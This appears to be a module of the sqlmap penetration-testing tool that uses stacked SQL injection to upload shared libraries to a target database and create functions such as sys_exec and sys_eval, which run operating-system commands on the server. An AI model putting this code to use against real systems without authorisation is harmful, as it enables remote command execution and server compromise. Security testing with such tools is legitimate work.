#!/usr/bin/env python """ $Id$ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/) See the file 'doc/COPYING' for copying permission """ import os from lib.core.agent import agent from lib.core.common import dataToStdout from lib.core.common import readInput from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.exception import sqlmapFilePathException from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUserQuitException from lib.core.unescaper import unescaper from lib.request import inject from lib.techniques.outband.stacked import stackedTest class UDF: """ This class defines methods to deal with User-Defined Functions for plugins. """ def __init__(self): self.createdUdf = set() self.udfs = {} self.udfToCreate = set() def __askOverwriteUdf(self, udf): message = "UDF '%s' already exists, do you " % udf message += "want to overwrite it? [y/N] " output = readInput(message, default="N") if output and output[0] in ("y", "Y"): return True else: return False def __checkExistUdf(self, udf): logger.info("checking if UDF '%s' already exist" % udf) query = agent.forgeCaseStatement(queries[kb.dbms].check_udf.query % (udf, udf)) exists = inject.getValue(query, resumeValue=False, unpack=False, charsetType=2) if exists == "1": return True else: return False def udfCheckAndOverwrite(self, udf): exists = self.__checkExistUdf(udf) overwrite = True if exists: overwrite = self.__askOverwriteUdf(udf) if overwrite: self.udfToCreate.add(udf) def udfCreateSupportTbl(self, dataType): debugMsg = "creating a support table for user-defined functions" logger.debug(debugMsg) self.createSupportTbl(self.cmdTblName, self.tblField, dataType) def udfExecCmd(self, cmd, silent=False, udfName=None): if udfName is None: cmd = "'%s'" % cmd udfName = "sys_exec" cmd = unescaper.unescape(cmd) inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent) def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): if udfName is None: cmd = "'%s'" % cmd udfName = "sys_eval" cmd = unescaper.unescape(cmd) inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd)) output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last) inject.goStacked("DELETE FROM %s" % self.cmdTblName) if isinstance(output, (list, tuple)): output = output[0] if isinstance(output, (list, tuple)): output = output[0] return output def udfCheckNeeded(self): if ( not conf.rFile or ( conf.rFile and kb.dbms != "PostgreSQL" ) ) and "sys_fileread" in self.sysUdfs: self.sysUdfs.pop("sys_fileread") if not conf.osPwn: self.sysUdfs.pop("sys_bineval") if not conf.osCmd and not conf.osShell and not conf.regRead: self.sysUdfs.pop("sys_eval") if not conf.osPwn and not conf.regAdd and not conf.regDel: self.sysUdfs.pop("sys_exec") def udfSetRemotePath(self): errMsg = "udfSetRemotePath() method must be defined within the plugin" raise sqlmapUnsupportedFeatureException(errMsg) def udfSetLocalPaths(self): errMsg = "udfSetLocalPaths() method must be defined within the plugin" raise sqlmapUnsupportedFeatureException(errMsg) def udfCreateFromSharedLib(self, udf=None, inpRet=None): errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" raise sqlmapUnsupportedFeatureException(errMsg) def udfInjectCore(self, udfDict): for udf in udfDict.keys(): if udf in self.createdUdf: continue self.udfCheckAndOverwrite(udf) if len(self.udfToCreate) > 0: self.udfSetRemotePath() self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", False) for udf, inpRet in udfDict.items(): if udf in self.udfToCreate and udf not in self.createdUdf: self.udfCreateFromSharedLib(udf, inpRet) if kb.dbms == "MySQL": supportTblType = "longtext" elif kb.dbms == "PostgreSQL": supportTblType = "text" self.udfCreateSupportTbl(supportTblType) def udfInjectSys(self): self.udfSetLocalPaths() self.udfCheckNeeded() self.udfInjectCore(self.sysUdfs) def udfInjectCustom(self): if kb.dbms not in ( "MySQL", "PostgreSQL" ): errMsg = "UDF injection feature is not yet implemented on %s" % kb.dbms raise sqlmapUnsupportedFeatureException(errMsg) stackedTest() if not kb.stackedTest and not conf.direct: return self.checkDbmsOs() if not self.isDba(): warnMsg = "the functionality requested might not work because " warnMsg += "the session user is not a database administrator" logger.warn(warnMsg) if not conf.shLib: msg = "which is the local path of the shared library? " while True: self.udfLocalFile = readInput(msg) if self.udfLocalFile: break else: logger.warn("you need to specify the local path of the shared library") else: self.udfLocalFile = conf.shLib if not os.path.exists(self.udfLocalFile): errMsg = "the specified shared library file does not exist" raise sqlmapFilePathException(errMsg) if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): errMsg = "shared library file must end with '.dll' or '.so'" raise sqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".so") and kb.os == "Windows": errMsg = "you provided a shared object as shared library, but " errMsg += "the database underlying operating system is Windows" raise sqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".dll") and kb.os == "Linux": errMsg = "you provided a dynamic-link library as shared library, " errMsg += "but the database underlying operating system is Linux" raise sqlmapMissingMandatoryOptionException(errMsg) self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] msg = "how many user-defined functions do you want to create " msg += "from the shared library? " while True: udfCount = readInput(msg, default=1) if isinstance(udfCount, basestring) and udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: logger.info("nothing to inject then") return else: break elif isinstance(udfCount, int): break else: logger.warn("invalid value, only digits are allowed") for x in range(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) if udfName: self.udfs[udfName] = {} break else: logger.warn("you need to specify the name of the UDF") if kb.dbms == "MySQL": defaultType = "string" elif kb.dbms == "PostgreSQL": defaultType = "text" self.udfs[udfName]["input"] = [] default = 1 msg = "how many input parameters takes UDF " msg += "'%s'? (default: %d) " % (udfName, default) while True: parCount = readInput(msg, default=default) if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break elif isinstance(parCount, int): break else: logger.warn("invalid value, only digits >= 0 are allowed") for y in range(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: parType = readInput(msg, default=defaultType) if isinstance(parType, basestring) and parType.isdigit(): logger.warn("you need to specify the data-type of the parameter") else: self.udfs[udfName]["input"].append(parType) break msg = "what is the data-type of the return " msg += "value? (default: %s) " % defaultType while True: retType = readInput(msg, default=defaultType) if isinstance(retType, basestring) and retType.isdigit(): logger.warn("you need to specify the data-type of the return value") else: self.udfs[udfName]["return"] = retType break self.udfInjectCore(self.udfs) msg = "do you want to call your injected user-defined " msg += "functions now? [Y/n/q] " choice = readInput(msg, default="Y") if choice[0] in ( "n", "N" ): self.cleanup(udfDict=self.udfs) return elif choice[0] in ( "q", "Q" ): self.cleanup(udfDict=self.udfs) raise sqlmapUserQuitException while True: udfList = [] msg = "which UDF do you want to call?" for udf in self.udfs.keys(): udfList.append(udf) msg += "\n[%d] %s" % (len(udfList), udf) msg += "\n[q] Quit" while True: choice = readInput(msg) if choice and choice[0] in ( "q", "Q" ): break elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) break elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): break else: warnMsg = "invalid value, only digits >= 1 and " warnMsg += "<= %d are allowed" % len(udfList) logger.warn(warnMsg) cmd = "" count = 1 udfToCall = udfList[choice - 1] for inp in self.udfs[udfToCall]["input"]: msg = "what is the value of the parameter number " msg += "%d (data-type: %s)? " % (count, inp) while True: parValue = readInput(msg) if parValue: if "int" not in inp and "bool" not in inp: parValue = "'%s'" % parValue cmd += "%s," % parValue break else: logger.warn("you need to specify the value of the parameter") count += 1 cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " choice = readInput(msg, default="Y") if choice[0] in ("y", "Y"): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: conf.dumper.string("return value", output) else: dataToStdout("No return value\n") else: self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " choice = readInput(msg, default="Y") if choice[0] not in ("y", "Y"): break self.cleanup(udfDict=self.udfs)